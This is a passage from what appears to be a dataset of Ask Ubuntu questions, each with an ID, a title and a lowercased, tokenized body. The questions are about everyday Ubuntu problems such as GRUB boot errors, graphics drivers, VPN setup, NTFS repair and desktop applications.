ubuntu or windows , bios is shifted over to the left of my screen , and i always get the same message : error : unknown filesystem grub rescue > typing `` ls '' at the prompt gives me the following : ( hd0 ) ( hd0 , msdos7 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) does this mean i have multiple partitions running windows on my computer ? is it possible to recover vista without the disk ? are all of my problems stemming from ubuntu not being compatible with win8 preview ? ( i realize the majority of my questions are about windows , but seeing as the prompt i get is for grub i thought i would ask here first . ) any insight anyone has on this predicament would be greatly appreciated .
111947	running 32-bit firefox with sun-jre in 64-bit ubuntu	i am trying to run juniper networks connect program to vpn into work and it only works on 32bit sun jre . all the things i have found with google failed so far . i ca n't use any scripts , like madscientists , as part of the authentication i need to provide some random characters from a grid . so to isolate this 32bit app install to a corner , i downloaded firefox and jre and unpack them to /opt . i run firefox with sudo as juniper asks for root password . here is firefox plugins folder /ot/firefox32/plugins # ls -la total 8 drwxr-xr-x 2 root root 4096 mar 11 00:57 . drwxr-xr-x 11 root root 4096 mar 10 23:48 .. lrwxrwxrwx 1 root root 49 mar 11 00:57 libnpjp2.so - > /opt/java/32/jdk1.6.0_31/jre/lib/i386/libnpjp2.so firefox lists sun jre but when check it with `` http : //java.com/en/download/installed.jsp '' it either ca n't detect java or firefox freezes any ideas ? thanks
111951	can not shutdown , this is what i see while shutting down	when i shutdown or reboot i can not do so . i get the error as mentioned in the screenshot ... it happens if any user tries it after logging in ... if i dont login at the lightdm screen on power on and execute shutdown or reboot i can ... but if i login even from a remote terminal i cant reboot ... . its very annoying..
111953	getting weird split screen on startup with msi radeon hd6450 ?	i had this problem with same card last month on my dads dual boot setup to where the card worked in windows but not in ubuntu.tonight i got a new system running with this card i installed ubuntu as only os and the install went fine , but upon reboot and first entering ubuntu my screen is split in half where my unity bar is in the middle.can anyone tell me how to step by step install what i need to do to get everything in working order with this card ? i really cant access much because ubuntu wont let me and i am pretty much a newbie still.i did read from one of my questions about my dads about compatible ati cards and it is listed but how can i install the drivers i need if my screen is split ?
111959	what is a `` bad quality '' package ?	what does it mean to have a bad quality package ( what qualities would it have to be a bad quality package ) and what happens if i install a package that has bad quality but still installs .
111970	application menu not working properly after upgrade from 11.10 to 12	aissue is that ( 1 ) alt+f1 & f2 is not working . ( 2 ) whenever i open applications menu by clicking with mouse pointer with just one tap on touchpad it opens but whenever i take mouse to submenu e.g . accessories , games , graphics & internet etc . it does nothing . when i click on games or other sub menu it just opens application panel for just 1 second and again it disappears . moreover in this situation if i have to open menu then i had to press left button of tab ( enter ) it does not work same with touchpad tap .
111976	opencv will not install due to libgtk2.0-dev dependencies	i am trying to install opencv on ubuntu 10.10 to use it with python . the problem that i am facing is related to installing gtk2.0-dev . i always get the following error the following packages have unmet dependencies : libgtk2.0-dev : depends : libglib2.0-dev ( > = 2.25.8 ) but it is not going to be installed depends : libgdk-pixbuf2.0-dev ( > = 2.21.0 ) but it is not going to be installed depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed depends : libatk1.0-dev ( > = 1.29.2 ) but it is not going to be installed depends : libcairo2-dev ( > = 1.6.4-6.1 ) but it is not going to be installed i tried to do everything what i found on the web to overcome the problem . i even tried to use synaptic manager where i found libgtk2.0-dev , but it gives me an error on the dependencies too . thanks in advance .
111982	ubuntu display repeats itself	i blew away windows xp using the ubuntu disk today on my dell inspiron 1100 . after linux installed and i rebooted , the display of ubuntu seems to repeat itself . so i have two login screens , and each does n't extend to the far right side of the monitor . i went to the dell site to download the drivers , but i did n't see an option for a linux operating system . what could cause this ? how can i fix it ? =============== problem 2 : the screen also keeps flickering
111996	create a directory with mkdir from broad	i am using ubuntu 11.10 and i am trying to create a directory in my home folder from another place without changing any directory . the way i am currently using from it is : cd ~ mkdir my_directory_name but i do n't want to use cd command and or any changing directory command . i googled my problem and i did n't find any thing . please help me !
112004	is there any web api for software center available ?	i wonder if there is an api available for using contents from the ubuntu software center on my webpage . i know the ubuntu apps directory website contains an almost complete database of applications available in ubuntu . there are all categories , it contains ratings , images , descriptions and also the download button . so , is it possible to use some of the content available on this page elsewhere ?
112006	black screen on install ( no os installed ) on a via p820 board	i 've read several posts about using -- nomodeset when trying to install . the hardware is a via p820 board , that about it ! i have tried this without success . boot from cd or usb device select language f6 select nomodeset esc remove 'quiet ' and ensure ' -- nomodeset ' is at the end of the boot string . enter . the cd or the usb device will flicker with activity for a second or two the screen goes black . the machine appears to go to sleep . i know this as i have a voltage indicator on the psu which tells me it drops from 12.01v to 4.97v as soon as the screen goes black can anyone help with this as i am desperate to get this working as i have a tight deadline to meet ! any help is appreciated ! thank you : ) simon .
112010	can i reinstall and keep updates and software from my wubi installation ?	i already have ubuntu 11.10 which i installed it using 'wubi ' . now i noticed that this kind of installation have some limitation like i ca n't hibernate and etc . now i want to reinstall my ubuntu from boot so i can have swap drive . but i already installed a lot of softwares from software center and also updated my ubuntu . is there any way i could install this softwares offline ? i do n't wan na download them again with my low speed internet : - (
112014	nautilus sftp via command line	i regularly connect to a server via ssh . lately i 've started copying files to and from it , and i find scp very annoying , mainly because bash can not auto complete over ssh . i find the connect to server ... option very useful , as i can drag and drop and everything . however , it is very annoying to type each time nautilus sftp : //server ( or fill the dialog box ) and then enter username and password , and then to cd to the desired folder . is there a way to do it in one line , something like nautilus ntfs : //server -u user ... i could n't find it anywhere in the documentation .
112024	where is the menu configuration stored ?	recently did a reinstall with a new profile and i 've just copied back over my wine install . everything works but i do n't have menus for any of it . does anybody know how to selectively copy back menu items from an old installation ?
112025	update gedit to 2.32 being able to use synctex on 11.04 ?	i found this nice demonstration showing the use of synctex with gedit and evince . i would like to use this nice feature but my ubuntu natty narwhal ( 11.04 ) does not have gedit in the version of 2.32. kon @ pc : ~ $ gedit -- version gedit - version 2.30.4 kon @ pc : ~ $ evince -- version gnome document viewer 2.32.0 how do i update gedit being able to use synctex ?
112028	how do i fix ubuntu after using `` sudo apt-get -remove pm-utils -- purge '' ?	my system is ubuntu 11.10 , laptop lenovo g570 i was having problems with hibernating so i looked up a couple of answers and tried a made the mistake of trying sudo apt-get -remove pm-utils -- purge '' sudo apt-get install pm-utils '' then i restarted and at the login screen , i type my password and press enter , it flickers then crashes back to the login screen
112034	how can i show the date a file or folder was created ?	i really need date created for folders/files . as far as i can see , this is not possible at present . just an option in preferences of given file manager will suffice . anybody ?
112039	how do i preseed postfix 's mailname ?	i do n't want postfix to ask for its mailname i just want it to use its fqdn name . this is my preseed file
112044	how to setup a pptp vpn connection ?	i need to connect my ubuntu server 11.04 to a pptp vpn . i went through google , all guides are about how to setup a pptp vpn server on ubuntu but not how to connect to them ... i do n't know how to do it with command line , nned your help..
112049	how to exclude a certain file type using newsmangler	i 'm trying to upload everything in a folder besides a .avi file and i was wondering what i would put at the end of the path for it to ignore all avi files . i know that putting `` /*avi '' will make it upload only the avi , but i 'm trying to make it upload everything besides the avi . so can someone give me some pointers as i 'm still fairly new the ubuntu world . here is the command i 'm using python poster.py -f `` [ test ] '' -c sample.conf -g alt.binaries.test /killer/desktop/downloads/the\folder\i\wanna\upload/* i 'm just trying to figure what i 'd have to do to upload that whole folder , but not upload the avi files inside it . i would just move the avi files out , but i plan on doing stuff like this a lot so i do n't wan na have to keep moving the files and would rather just know how to exclude them .
112050	acer aspire one d270 can not set brightness	i hope you can help me figure out how to set the brightness at my netbook . following problem appears since i installed ubuntu 11.10 on my acer : i am not able to adjust the brightness by fn keys nor manually at `` systemsettings-display '' . after searching with google for a while , i found a way via the terminal to adjust it with the folloqing command : `` sudo setpci -s 00:02.0 f4.b=7f '' ( from 00-9f ) . that was a major breakthrough for me as i am still new to linux os . but still seeking a way to get the fn keys for brightness to work , i kept searching until i found `` askubuntu.com '' . i read through various questions by other acer users and tried there solutions , but unfortunately none worked out for me . from this thread : fn + arrow keys do n't adjust actual brightness on an acer aspire 5740 '' sudo gedit /etc/x11/xorg.conf '' . this command did not work because the file was not found . i also used nano instead of gedit , but the file was empty ( i think it just created the file since it did not exist ) . these commands which i found gave me a boot loop and i had to repair ubuntu : sudo gedit /etc/default/grub change the line grub_cmdline_linux= '' '' into grub_cmdline_linux= '' acpi_osi=linux '' sudo update-grub from this post screen brightness not adjustable for acer aspire s3 : i tried the solution from the last post , but it did not work either . does anyone know what i could try ? i would appreciate it , if someone could help me out with this . thanks in advance netbook specs : cpu : intel atom n2600 memory : 2gb ddr3 storage : 320 gb hd gpu : intel gma 3600
112052	which terminal does ubuntu use ?	i 've recently moved to linux mint , but i 've always preferred the ubuntu terminal over the xterm that is used in xfce and kde , can anyone tell me what it is called or where i can download it ? thanks !
112053	how to make time/date program , shell model of program ?	i ran in shell： # ！ /bin/bash log=monday echo `` today is $ log '' echo `` today is 'date ' '' but the result is : today is monday today is 'date' how do i make it display the day and date . thank you for searching。
112057	ca n't access already created mail account in sylpheed	i 'm using gmail . i created an imap4-account using the wizard . it shows the folder with my account name but it does n't open on a double-click and clicking on `` get mail '' does n't do anything . i did a reboot , uinstalled sylpheed and reinstalled . i used the `` purge '' command but after reinstalling , my account was there again . i still ca n't get my mail . the `` delete account '' -option you get when you right-click on it is greyed out by the way , so i ca n't delete and re-create it .
112058	how do i get my mblaze usb modem working ?	i am new to ubuntu and have installed version 11.10 alongside windows . i have got a mblaze mts wireless usb which i use to connect to internet . i have installed its drivers which were provided by mblaze . now , when i connect through its software interface , everything works fine and i connect to internet . but the problem is that the network manager does n't show me connected . as a result , i am not able to install softwares through software manager ( `` install '' / '' use this source '' button is disabled ) . then , i manually created the mobile broadband connection . even then , it does n't connect . i heard that synaptic can be used to install softwares too but it is not installed by default and i do n't know how to install it from terminal . my problem will be solved if either : network manager shows me connected when i connect through software interface i be able to connect manually synaptic manager is installed through terminal . i know the command is sudo apt-get install synaptic but it does n't work probably because sources.list has n't got it . and i do n't know the exact steps . edit : my hardware config : 2nd generation core i3 ( 2330 m ) , 4 gb ddr3 ram , 500 gb hdd , 1 gb amd radeon hd 6470m 'lsusb ' gives the following : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 0a5c:21e3 broadcom corp . bus 002 device 003 : id 046d : c52e logitech , inc . bus 002 device 004 : id 05c8:021e cheng uei precision industry co. , ltd ( foxlink ) bus 001 device 007 : id 19d2 : fff1 onda communication s.p.a. additional info : just installed the synaptic manager and i am able to install softwares through it . though i would like to solve other problems too . just noticed this : when i did n't plug in my dongle , the option of connecting through mobile broadband does n't show up . however , when i plug in the device , it shows the option of connecting mblaze modem ( the manual connection i made ) . but as usual , it just tries to connect and does n't succeed .
112059	installing from packages in /usr/bin	i 'm a total ubuntu newbie and i have a doubt regarding installation from downloaded packages ( from websites ) . i have been trying to install netbeans 7 in ubuntu 11.10 . i have downloaded the .sh package from the netbeans website and i can install it but only in a folder inside my user folder . i have read somewhere that programs are installed in /usr/bin , and for example i have installed the java sdk in that location . but i ca n't install netbeans there . if i try to put it in the /usr/bin i get the message that is a read-only folder and i ca n't hit next ... and i wonder if there 's a way to install it in that location because i would n't like to have it installed within my documents . i have n't found any info related to this searching in google , so really thankful if you can help me with this .
112061	how to take a screenshot of login screen ?	i want to make a screenshot of my login screen on ubuntu 11.10 . so far , no method i read here has worked out for me . so i 'm asking it here now . how can i accomplish this without creating a vm to screencap it outside the box ?
112069	nothing shows up in the terminal when i type my password	when i 'm about to install a program in the terminal it wants the password : [ sudo ] password for xxx : but when i want to type my password it happens nothing . what should i do ?
112071	manually add library to installed packages	i 'm trying to install opencv libraries . there were some dependencies that apt ca n't locate : libcudart4 libcufft4 libnpp4 these libraries are part of cuda from nvidia . so i installed cuda and now i have the following additional libs : libcudart.so.4 ( libc6 , x86-64 ) = > /usr/local/cuda/lib64/libcudart.so.4 libcufft.so.4 ( libc6 , x86-64 ) = > /usr/local/cuda/lib64/libcufft.so.4 libnpp.so.4 ( libc6 , x86-64 ) = > /usr/local/cuda/lib64/libnpp.so.4 ( and some more ) however , apt does n't know about these libs and therefore i still ca n't install opencv . so my question is : how can i tell apt that these libraries are installed ?
112082	can i use ubuntu as a file server ?	can i use an ubuntu desktop system as a file server or is ubuntu server better suited for that , and how about the permissions per folder and file ? sorry but this is my first time to use ubuntu . i 'm using windows server 2003 as my file server but i have lots of problem due to viruses and i hope ubuntu could be my solution .
112084	how can i scroll down in this window provided by eclipse ?	in eclipse 's android plugin , i 'm trying to create a new project , however the window wo n't let me scroll down . is there a way to fix this ? note the image attached . http : //www.matthewhaworth.net/screenshot.png
112092	high cpu usage when watching youtube videos ( html5 ) ?	when i watch a youtube video , especially in hd , the browser i 'm using ( chrome ) will use in excess of 200 % of the cpu . this causes the video to stutter and also makes my laptop very hot . is it normal for it to use this much cpu ? also , it 's even worse when i watch it fullscreen . i 'm on a dell studio xps1645 with a first generation i7 and a ati radeonhd 4670 graphics card ( with the latest proprietary drivers ) . running ubuntu 12.04 ( but the same thing happens with earlier versions ) . also i 'm using the html5 version of youtube as flash performs even worse.. can anyone help me resolve this issue or at least tell me if this is normal ? thanks
112093	byobu available updates broken on ubuntu 10.04 lts ?	i noticed that since release of byobu 5.10 the available updates in the lower bar behaves funny : you issue for example an apt-get update available updates pop out with the # ! in the lower bar apt-get upgrade the number does n't disappear , unless the system is restarted if you the apt-get update again and new updates came out meanwhile the number wo n't change anymore .
112094	why are menus in libreoffice not rendering correctly and how can i fix this ?	with most programs , context ( right-click ) menus and other menus have a shadow under them to indicate that they 're separate from the rest of the program . this makes them easy to read . in libreoffice , however , menus do n't have shadows , and the top menu ( file/edit/view , etc ) is still in the program window itself , instead of in the global menu . how can i fix these problems ? this is on kubuntu 11.10 .
112104	best way to `` overlay '' ubuntu over existing windows os	i have an existing windows installation with important applications . i want to take advantage of unix tools and os environment of ubuntu . what would be the best way for me to 'overlay ' ubuntu on top of existing windows environment ? - i need to run both os and use the windows apps everyday ( the windows apps are computationally intensive like matlab -- i 'll migrate these apps to use the linux version one by one once i see the setup is better for the way i work ) - i would like to have ubuntu to see the windows file system ( windows xp , windows vista , windows 7 for three diff computers ) - i would like to retain maximum performance for both os - i want to safely implement this change and be able to reverse this without too much trouble . i know about wubi but want a more permanent solution . i 'm thinking repartitioning and installing ubuntu , .. then from there start something like zen to 'boot ' into windows to run my windows app.. while being able to do things like search thru the windows file system from ubuntu.. can you please help with details/links on how to do this satisfying the constraints above ? thanks for your help .
112105	if i upgrade from 11.10 to 12.04 will i lose my tomboy notes ?	i use tomboy extensively and keep lots of random , connected things there i would not want to bother replicating or backing up too heavily . if i /will/ lose them when mono is removed and tomboy is dropped , what can i do to preserve my data ? i 'm curious about the actual mechanism here -- -does an upgrade destroy my current tomboy installation , or is it just the case that tomboy is n't installed by default for /new/ installs , but that the stuff i already have is preserved under an upgrade situation ?
112114	install wizard flickering dialog : `` wired network - disconnected - you are now offline ''	i 'm installing a fresh copy of ubuntu linux version 11.10 . when going through the install wizard , there is a black popup in the top right hand corner of the screen that keeps flickering randomly and says `` wired network disconnected - you are now offline '' . when the popup goes away , the network triangular looking icon in the system tray starts flashing like the network is good . yet , when i get to the `` preparing to install ubuntu '' screen , it says , `` for best results , ensure that this computer is ... '' . there are two check marks ( meaning it was okay ) , but the 3rd option has an `` x '' ( meaning something is wrong ) not a check mark , and says `` is connected to the internet '' , which tells me it 's still not connected . the reason i 'm concerned here is due to my last question . when ubuntu installed the first time , it was n't connected to the internet and did n't download my dell inspiron 1100 drivers , and therefore my screen resolution was all messed up . i plugged the ethernet cable directly into the laptop . so i 'm not using a wired connection . that ethernet cable was previously connected to a computer that had access to the internet so i know that port on the router is good . how can i troubleshoot this connection issue ?
112116	which file is changed after i do `` make menuconfig '' ?	in linux , i thought that the file makefile is changed after i run make menuconfig . but when i diff makefile , i do n't see any difference . which file is changed after i do make menuconfig ?
112117	how to burn a cd at low speed ?	i am trying to burn iso image of lubuntu 11.10-alternate ( i tried active iso and free iso burner ) . the problem is that the burning of cd should take place at low speed ( i.e . 4x or low stated here in second last topic ) but as soon as i insert the cd ( which is 52x speed ) the option of 4x and lower disappears . i have tried to find a less than 52x speed cd but have n't got one yet . now is there any trick or a software so that i could write an iso image at 4x or lower speed ? i have tried writing iso images at higher speeds but the iso file gets corrupted ( knew because checked the integrity of it right after the boot up ) and i have gone through this process for four times .
112120	i want to remove a broken windows 7 boot option from grub but grub customizer generates an error at startup	i have two options for windows 7 in grub but one is broken and just says `` ctrl-alt-del to restart . '' the other windows 7 option works just fine . here is the error message that grub customizer is giving me grub-mkconfig could n't be executed successfully . error message : generating grub.cfg ... found linux image : /boot/vmlinuz-3.0.0-16-generic found initrd image : /boot/initrd.img-3.0.0-16-generic found linux image : /boot/vmlinuz-3.0.0-12-generic found initrd image : /boot/initrd.img-3.0.0-12-generic adding windows adding windows /etc/grub.d/11_windows.save : 9 : ^k : not found
112121	why is the libreoffice icon just an x with a circle around it ?	the libreoffice icon looks ok from within the menu or launchers , but in the window decoration and in the dock it turns into a big x with a circle around it . i 'm using kubuntu 11.10 , by the way , with the 4.8 backports ppa .
112123	how do i maximize the sound volume on a macbook pro in gnome shell ?	how do you maximize sound volume in gnome shell under ubuntu 11.10 ? i have a macbook , and my sound and volume keys generally work , but even if i use the volume keys to set volume to 100 % , the sound is very low . however , if i open the sound dialog , the `` output volume '' slider goes up to 150 % , which allows me to comfortably hear sound . unfortunately , if i use the volume keys thereafter , it practically mutes the sound again , and does n't let me increase the volume to 150 % without first opening the sound settings dialog . i know how to use system settings to increase volume beyond 100 % . what i want is for 100 % to actually be the true 100 % so when i use the volume key to increase volume , it does n't decrease volume . e.g . if i set it to 150 % , and then press the `` increase volume '' key , the volume goes down to 100 % . i 've found plenty of solutions for getting sound working in general , but nothing for this specific case where 100 % volume does not actually represent full volume . i 'm not sure how else to describe this , or what specifically i should be searching for to resolve it on my own .
112125	how to install non compiled programs ?	i was using ubuntu from 9.8 until now 11.10 , and there are some programs that have this sequence to install : in the terminal cd to the program 's folder and write ./configure write configure make make install but this never works with me with any version of ubuntu , so what to do to install these non compiled programs ? ? ?
112128	installed plasma widgets and login screens do n't show up	i downloaded some login screens and plasma widgets from system settings in kubuntu , but they do n't show up as selectable options . it says they 're installed but i ca n't choose them . any suggestions ?
112129	ubuntu one notes access through api	now that ubuntu one notes web interface has been binned , i need to write an application for my blackberry to read my ubuntu one notes . can someone point me in the direction of an api resource for notes please ?
112135	is there an ide and compiler for c # in ubuntu ?	i 'm looking for an ide and compiler for c # in linux like visual studio or ... to design forms an run programs . i 'm moved to linux newly .
112141	unity : how do i see all applications from all workspaces ?	in 2 weeks ubuntu 10.10 supports ends , so i have to think about using either gnome 3 or unity . i already have some experience with gnome 3 on my test computer but i 'm not yet committed to it because this is no system for people who need to efficiently work . the window handling is very cumbersome ( maybe it 's better with some extensions ) , because you ca n't pull a window with left mouse button holding from one workspace to another as it worked in gnome 2 with compiz fusion and i could n't manage it to show all open application in the task bar and i did n't even find a possibility to configure own launchers . i have n't seen unity yet , but i do n't like to install it to recognize that it possibly sucks more than gnome 3 , so before i take a choice i 'd like to know if this is possible in unity : dragging and dropping an open application from one workspace to another as it was possible in gnome 2 with compiz without tinkering around with minimizing/maximizing windows or any combination of ctrl , alt key or whatever , just holding left mouse button and pulling it to another workspace . edit : yes its possible : can i drag a window onto another workspace ? so my question is really : do i see all running application of every workspace in unity as it was able in gnome 2 taskbar ?
112142	prioritize ppa/repos with the same host	i 'm using gimp every day ( on 11.10 ) . because of this , i need the single-window mode feature . so , i 've added the matthaeus123/mrw-gimp-svn ppa , but as you see the description : gimp 2.7.5 will not work with the current glib and gtk in oneiric . to fix the problem install these repos deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu oneiric main deb http : //ppa.launchpad.net/ricotz/testing/ubuntu oneiric main i had to install them . the gnome3 repo is quite ok , but the ricotz testing is full of new unity and other not needed update . as the result of the previous , i 'm experiencing some ui inconveniences . ( eg . the backgrounds and the text colors of the indicators ' menus are nearly the same - so hard to read them . ) ( as it is shown there : ) you are getting bleeding edge snapshots ! you should have a stable experience most of the time , but there will be problems ! i 've googled around about repo prioritizing , and i 've found the repo host pin option : package : * pin : origin `` ftp.debian.org '' pin-priority : 400 it is too much ! i 've other ppas , whose are ok . i wan na just the bad one : ricotz/testing . i 've heard about ppa-purge . so the downgrade wo n't be a problem . i just wonder the prioritizing of the repos , or other sources of gimp single-window mode+gnome shell ( 3 ) . please help me ! thank you !
112148	how to browse by album art in rhythmbox ?	how do i browse album covers in rhythmbox ? i 'm looking for how to browse album art in newer versions of rhythmbox i tried rhythmarty plug in but i think it 's very old so it ca n't be used , it does not appear on the plug in list . other options require gnome 2 and i use gnome-shell .
112149	usb hd enclosure `` sleeps '' , file system errors ensue , ca n't remount , device disappears . help interpreting these logs ?	i am using this enclosure over usb2 with ubuntu 11.10 : http : //www.newegg.com/product/product.aspx ? item=n82e16817173042 after a period of inactivity , the enclosure seems to sleep and ubuntu is n't able to wake it . i have confirmed that the internal drive is working ( no bad blocks , etc ) . furthermore , in windows when the enclosure sleeps it seems as though windows is able to wake it upon accessing the drive . in ubuntu i only get i/o errors when accessing the mount point . the relevant portion of syslog is shown below . can someone tell me if this confirms my thoughts above ? what should i do ? mar 11 14:35:30 iwill-x61 kernel : [ 320435.920084 ] usb 2-2 : reset high speed usb device number 34 using ehci_hcd mar 11 14:35:30 iwill-x61 kernel : [ 320436.052429 ] usb 2-2 : device firmware changed mar 11 14:35:30 iwill-x61 kernel : [ 320436.052496 ] usb 2-2 : usb disconnect , device number 34 mar 11 14:35:30 iwill-x61 kernel : [ 320436.053107 ] sd 16:0:0:0 : device offlined - not ready after error recovery mar 11 14:35:30 iwill-x61 kernel : [ 320436.056960 ] xfs ( sdc1 ) : xfs_do_force_shutdown ( 0x1 ) called from line 1052 of file /build/buildd/linux-3.0.0/fs/xfs/linux-2.6/xfs_buf.c . return address = 0xffffffffa04abc43 mar 11 14:35:30 iwill-x61 kernel : [ 320436.056976 ] xfs ( sdc1 ) : i/o error detected . shutting down filesystem mar 11 14:35:30 iwill-x61 kernel : [ 320436.056982 ] xfs ( sdc1 ) : please umount the filesystem and rectify the problem ( s ) mar 11 14:35:30 iwill-x61 kernel : [ 320436.276053 ] usb 2-2 : new high speed usb device number 38 using ehci_hcd mar 11 14:35:30 iwill-x61 kernel : [ 320436.412175 ] scsi17 : usb-storage 2-2:1.0 mar 11 14:35:30 iwill-x61 mtp-probe : checking bus 2 , device 38 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-2 '' mar 11 14:35:31 iwill-x61 mtp-probe : bus : 2 , device : 38 was not an mtp device mar 11 14:35:40 iwill-x61 kernel : [ 320446.048060 ] xfs ( sdc1 ) : xfs_log_force : error 5 returned . mar 11 14:35:53 iwill-x61 kernel : [ 320458.960073 ] usb 2-2 : reset high speed usb device number 38 using ehci_hcd mar 11 14:36:03 iwill-x61 kernel : [ 320469.204057 ] usb 2-2 : reset high speed usb device number 38 using ehci_hcd mar 11 14:36:10 iwill-x61 kernel : [ 320476.128565 ] xfs ( sdc1 ) : xfs_log_force : error 5 returned . mar 11 14:36:19 iwill-x61 kernel : [ 320485.448076 ] usb 2-2 : reset high speed usb device number 38 using ehci_hcd mar 11 14:36:20 iwill-x61 kernel : [ 320485.696111 ] usb 2-2 : reset high speed usb device number 38 using ehci_hcd mar 11 14:36:30 iwill-x61 kernel : [ 320495.940068 ] usb 2-2 : reset high speed usb device number 38 using ehci_hcd mar 11 14:36:30 iwill-x61 kernel : [ 320496.072729 ] scsi 17:0:0:0 : device offlined - not ready after error recovery mar 11 14:36:40 iwill-x61 kernel : [ 320506.208076 ] xfs ( sdc1 ) : xfs_log_force : error 5 returned . mar 11 14:37:10 iwill-x61 kernel : [ 320536.288054 ] xfs ( sdc1 ) : xfs_log_force : error 5 returned . mar 11 14:37:40 iwill-x61 kernel : [ 320566.368072 ] xfs ( sdc1 ) : xfs_log_force : error 5 returned . mar 11 14:38:10 iwill-x61 kernel : [ 320596.448067 ] xfs ( sdc1 ) : xfs_log_force : error 5 returned .
112150	how to correctly fix a `` dirty '' ntfs partition without using chkdsk	when i try to do a ntfsck to a ntfs partition i get this : sudo ntfsck /dev/sdb1 unsupported : replay_log ( ) volume is dirty . unsupported : check_volume ( ) checking 161792 mft records . unsupported cases found . how can i clean a `` dirty '' ntfs volume without having to actually use windows chkdsk tool in the ntfs volume . i also did a ntfsfix and it said that everything was ok but it actually was not . i also get the same `` dirty '' error when trying to check the filesystem using the disk utility : i am starting to think i need some powerful soap .
112152	wow severe graphical corruption on ubuntu 11.10	i get those graphical glitches when running wow 4.2.0 with wine ( ubuntu 11.10 amd64 ) , in a dell xps 15 ( l501x ) , even with ironhide . anyone can help me ? cpu : intel core i5-460m 4gb ram because it 's a dell xps 15 ( optimus technology ) , i have 2 graphic cards : an intel hd 460m integrated graphics card , which driver is i915 a nvidia geforce gt 420m , already with propietary drivers running ubuntu 11.10 amd64 with custom xfce desktop wine 1.4 rc6 ( emulating winxp ) corefonts and vc2005 installed on wine
112153	debugging mono outside of monodevelop	i 've been writing a console application in c # using monodevelop . while i can run the application and pass command line arguments to it , i can not for the life of me figure out how to debug it and pass in arguments . i 've tried using the command line to launch mdb - instructions here however on ubuntu 11.10 it can not locate the debugger 05:15:53 { master } ~/projects/someproject/bin/debug $ mdb no command 'mdb ' found , did you mean : so , where is the mono debugger , and how do i debug command line applications built with mono that depend on arguments ?
112156	windows 7 wo n't boot from grub	i am trying to set up a machine to dual-boot windows 7 and ubuntu . installed windows 7 first , all seemed fine . installed ubuntu 10.04 ( to avoid having unity installed by default , which many people have mentioned to me is annoying ) . now when selecting windows 7 from the grub menu , it simply blank-screens and the returns to the grub menu . below is the results of the boot info script . have tried running testdisk , and getting it to check the windows boot sector ; it says both the boot sector and backup boot sector are ok and match each other . but if the windows boot sector is fine , why would n't the usual `` chainloader +1 '' approach work ? ? have also tried checking forums for similar problems , but they mostly seem to be people who have accidently installed grub to the windows partition instead of the mbr - according to the bootinfo script results we have n't made that particular mistake here . boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > grub2 ( v1.97-1.98 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 2 for /boot/grub . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : extended partition boot sector type : windows vista/7 boot sector info : sda5 : __________________________________________________________________________ file system : vfat boot sector type : fat32 boot sector info : according to the info in the boot sector , sda5 starts at sector 0 . but according to the info from fdisk , sda5 starts at sector 126 . operating system : boot files : sda2 : __________________________________________________________________________ file system : ext2 boot sector type : - boot sector info : operating system : ubuntu 10.04.3 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sdb1 : __________________________________________________________________________ file system : vfat boot sector type : fat32 boot sector info : according to the info in the boot sector , sdb1 starts at sector 0 . but according to the info from fdisk , sdb1 starts at sector 63 . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 300.1 gb , 300069052416 bytes 255 heads , 63 sectors/track , 36481 cylinders , total 586072368 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 217,439,774 217,439,712 5 extended /dev/sda5 126 217,439,774 217,439,649 b w95 fat32 /dev/sda2 217,439,775 401,753,519 184,313,745 83 linux /dev/sda3 * 401,753,520 586,067,264 184,313,745 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 41.2 gb , 41174138880 bytes 255 heads , 63 sectors/track , 5005 cylinders , total 80418240 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 63 80,405,324 80,405,262 b w95 fat32 '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda2 626bd315-3ecc-4724-96a4-39f00b5f6331 ext2 l /dev/sda3 457351f40cffde49 ntfs c /dev/sda5 7ed4-1fa1 vfat data /dev/sdb1 001a-9858 vfat internal 40 ================================ mount points : ================================= device mount_point type options /dev/sda2 / ext2 ( rw , errors=remount-ro ) =========================== sda2/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by /usr/sbin/grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then load_env fi set default= '' 0 '' if [ $ { prev_saved_entry } ] ; then set saved_entry= $ { prev_saved_entry } save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z $ { boot_once } ] ; then saved_entry= $ { chosen } save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n $ { have_grubenv } ] ; then if [ -z $ { boot_once } ] ; then save_env recordfail ; fi ; fi } insmod ext2 set root= ' ( hd0,2 ) ' search -- no-floppy -- fs-uuid -- set 626bd315-3ecc-4724-96a4-39f00b5f6331 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 insmod gfxterm insmod vbe if terminal_output gfxterm ; then true ; else # for backward compatibility with versions of terminal.mod that don't # understand terminal_output terminal gfxterm fi fi insmod ext2 set root= ' ( hd0,2 